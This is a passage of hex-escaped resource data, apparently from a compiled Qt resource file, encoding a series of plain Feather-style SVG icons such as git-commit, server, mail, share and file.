\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x2d\x63\
\x6f\x6d\x6d\x69\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\
\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\
\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x2e\x30\x35\x22\x20\x79\x31\
\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\
\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x37\x2e\x30\x31\x22\x20\x79\x31\x3d\
\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x32\x32\x2e\x39\x36\x22\x20\
\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x48\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x65\x6e\x64\
\x69\x6e\x67\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x36\x20\x31\
\x33\x2e\x35\x20\x31\x35\x2e\x35\x20\x38\x2e\x35\x20\x31\x30\x2e\
\x35\x20\x31\x20\x31\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x37\x20\x36\x20\x32\x33\x20\x36\x20\x32\
\x33\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x63\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x61\x67\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\x2e\x35\x39\x20\
\x31\x33\x2e\x34\x31\x6c\x2d\x37\x2e\x31\x37\x20\x37\x2e\x31\x37\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x38\x33\x20\
\x30\x4c\x32\x20\x31\x32\x56\x32\x68\x31\x30\x6c\x38\x2e\x35\x39\
\x20\x38\x2e\x35\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x30\x20\x32\x2e\x38\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x37\x22\x20\x79\x31\x3d\
\x22\x37\x22\x20\x78\x32\x3d\x22\x37\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xaf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x65\x72\x76\x65\
\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\
\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x38\x22\x20\x72\x78\x3d\x22\x32\
\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\x3d\x22\x31\
\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x38\x22\x20\x72\x78\x3d\x22\x32\x22\x20\
\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x36\
\x22\x20\x78\x32\x3d\x22\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\
\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\
\x32\x3d\x22\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x85\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x61\x73\x68\x22\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\
\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x32\x30\x22\x20\x79\x32\x3d\
\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x31\x35\x22\x20\
\x78\x32\x3d\x22\x32\x30\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x30\x22\x20\x79\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\
\x38\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\
\x79\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\
\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\xbd\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x61\x72\x65\
\x2d\x32\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x38\x22\x20\x63\x79\x3d\x22\x35\x22\x20\x72\x3d\x22\x33\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x36\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\x22\x20\
\x63\x79\x3d\x22\x31\x39\x22\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x38\x2e\x35\x39\x22\x20\x79\x31\x3d\x22\x31\x33\x2e\x35\x31\
\x22\x20\x78\x32\x3d\x22\x31\x35\x2e\x34\x32\x22\x20\x79\x32\x3d\
\x22\x31\x37\x2e\x34\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x2e\x34\x31\x22\x20\
\x79\x31\x3d\x22\x36\x2e\x35\x31\x22\x20\x78\x32\x3d\x22\x38\x2e\
\x35\x39\x22\x20\x79\x32\x3d\x22\x31\x30\x2e\x34\x39\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x6a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x66\x6f\x72\x77\x61\x72\x64\x65\x64\x22\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x39\
\x20\x31\x20\x32\x33\x20\x35\x20\x31\x39\x20\x39\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x35\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x35\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\
\x20\x31\x36\x2e\x39\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\
\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\
\x2d\x33\x2e\x30\x37\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\
\x30\x20\x30\x20\x31\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\
\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\
\x2d\x38\x2e\x36\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x34\x2e\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\
\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\
\x2e\x38\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\
\x35\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\
\x61\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\
\x6c\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\
\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\
\x32\x2e\x38\x31\x2e\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x32\x20\x31\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x62\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x69\x6c\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x34\x68\x31\
\x36\x63\x31\x2e\x31\x20\x30\x20\x32\x20\x2e\x39\x20\x32\x20\x32\
\x76\x31\x32\x63\x30\x20\x31\x2e\x31\x2d\x2e\x39\x20\x32\x2d\x32\
\x20\x32\x48\x34\x63\x2d\x31\x2e\x31\x20\x30\x2d\x32\x2d\x2e\x39\
\x2d\x32\x2d\x32\x56\x36\x63\x30\x2d\x31\x2e\x31\x2e\x39\x2d\x32\
\x20\x32\x2d\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x32\x32\x2c\x36\x20\x31\x32\x2c\x31\x33\x20\x32\x2c\x36\x22\x3e\
\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x61\x79\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x31\x30\x20\x38\x20\x31\x36\x20\x31\x32\x20\x31\x30\x20\x31\
\x36\x20\x31\x30\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\
\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x51\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x33\x20\x32\x48\
\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x32\x76\
\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\
\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x56\x39\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x33\x20\x32\x20\x31\x33\x20\x39\x20\x32\x30\x20\x39\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x6c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x61\x72\x65\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x32\
\x76\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\
\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x76\x2d\x38\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x36\x20\x36\x20\x31\x32\x20\x32\x20\x38\x20\x36\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\
\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
